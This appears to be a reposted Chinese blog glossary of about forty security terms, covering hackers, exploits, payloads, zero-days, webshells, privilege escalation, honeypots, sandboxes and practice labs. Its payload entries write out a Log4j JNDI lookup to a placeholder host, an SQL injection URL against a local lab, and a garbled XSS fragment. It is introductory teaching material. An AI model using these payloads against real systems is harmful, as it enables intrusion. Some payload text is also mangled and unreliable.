其他分享
首页 > 其他分享> > 安全术语

安全术语

作者:互联网

 

1、黑客(hacker)---对计算机技术非常擅长的人,窃取数据,破坏计算机系统

2、脚本小子---刚刚入门安全行业,学习了一些技术,指挥使用现成的工具或者从网上复制代码。

3、白帽子---白帽子的目的是发现企业的漏洞并且上报给企业,帮助其解决风险问题(360补天,漏洞盒子,CNVD,CNNVD)

4、红帽黑客---有正义感,爱国的黑客。利用技术维护国家网络安全,并且对外来的攻击进行反击。

5、漏洞(英文vulneability):

漏洞指的是硬件,软件按协议等等存在的安全缺陷

 

6、POC (Proof of Concept)

能证明漏洞存在的代码
例:S{jndi:ldap://xxxxxx.dnslong.cn/test}

 

7、exp(Exploit--利用)

执行了这一段利用代码之后,就能够达到攻击的目的。

 

8、payload:载荷

①SQL注入(http://localhost/sqli-labs/;ess-3/?id=-1' union select 1,1.database()--+)

②XSS (< >(1)< />) 空格去掉

③log4j ${jndi:ldap://xxxxx/dms;pg.cn/test}

9、0day:使用量非常大的产品被发现 官方还未发布补丁和恢复

10、1day:漏洞被公开但是公布时间段导致还没有大范围的补丁修复

11、Nday漏洞:漏洞公开并且已经过去比较长的时间的漏洞

12、漏扫:基于数据库对漏洞进行自动化扫描 AWVS appscan

13、补丁:patch 漏洞修复程序

14、渗透:pennetration 黑客入侵获取权限的过程

15、渗透测试:pennetration test 授权后的入侵获取权限

16、木马:Trojan house 隐藏在系统中的恶意程序

17、病毒:Virus 恶意代码或程序

18、杀毒软件:瑞星 金山 卡巴斯基 360

19、免杀 :绕过杀毒软件

20、肉鸡:被黑客获取了控制权限的机器,可能是个人电脑也可能是企业的服务器

21、抓鸡:通过漏洞,自动化的获取肉鸡的行为

22、跳板机:自己的电脑容易被溯源,所以通过肉鸡的电脑进行转接

23、DDOS:Distributed Denial of Service 分布式拒绝服务攻击 发起大量恶意请求,导致正常用户无法访问

24、后门:backdoor 黑客为了对主机进行长期控制,在计算机上种植的一段程序或留下的一个“入口”,木马可能会充当后门

25、中间人攻击 在客户端与服务器之间布置一台黑客的服务器作为中转,从而窃取、篡改用户请求服务信息

26、网络钓鱼 冒充网站,窃取用户的账号密码

27、webshell shell是一种命令执行工具,可以对计算机进行控制asp php jsp之外的代码文件,可以通过这些代码文件可以执行任意的命令,对计算机做任意的操作,分为小马(仅有文件上传功能)、一句话木马,通过一些网站管理工具来连接、大马,一个有可操作界面的木马

28、Getshell 获得执行命令的环境(redis持久化 mysql写文件的功能 mysql的日志记录功能 上传功能 数据备份功能 编辑器)

29、提权 通过漏洞使得自己获取的一个用户权限升级为管理员权限

30、拿站 拿到了最高权限

31、拖库 把网站的全部数据导出了

32、撞库 获取裤子去批量登录其他网站,因为部分人建立账号密码都相同

33、旁站入侵 入侵同服务器的其他网站

34、横向移动 攻击者入侵一台服务器陈恭候,基于内部网络,继续入侵同网段的其他机器

35、代理 Proxy 带我们发起网络请求的一台服务器

36、VPN Virtual Private Network 代理 加密通信 办公-在家里连到公司内网

37、 蜜罐 Honeypot 吸引攻击者攻击的伪装系统,用来实现溯源和反制 免费蜜罐HFish

38、沙箱 Sandbox 沙箱是一种按照安全策略限制程序行为的执行环节,就算用恶意代码,也只能影响沙箱环境而不会影响到操作系统 云沙箱-微步

39、靶场 模拟有漏洞的环境 可以是网站、容器、操作系统等

①web综合靶场-DVWA pikachu bwapp

②web专用靶场-sqli-labs、upload-labs、xss-labs

③漏洞复现靶场-比如CVE 44228

④操作系统靶场-vulnhub

⑤CTF靶场-专门用来联系CTF题目,每个人都有一个独立的环境

40、堡垒机 跳板机 运维审计系统-管理一些资源、用户、虚拟机等

41、WAF Web Application Firewall 网络应用防火墙 对HTTP和HTTPS的流量内容进行分析、拦截恶意攻击行为

标签:术语,漏洞,labs,安全,黑客,沙箱,靶场,权限
来源: https://www.cnblogs.com/hx0708/p/16425038.html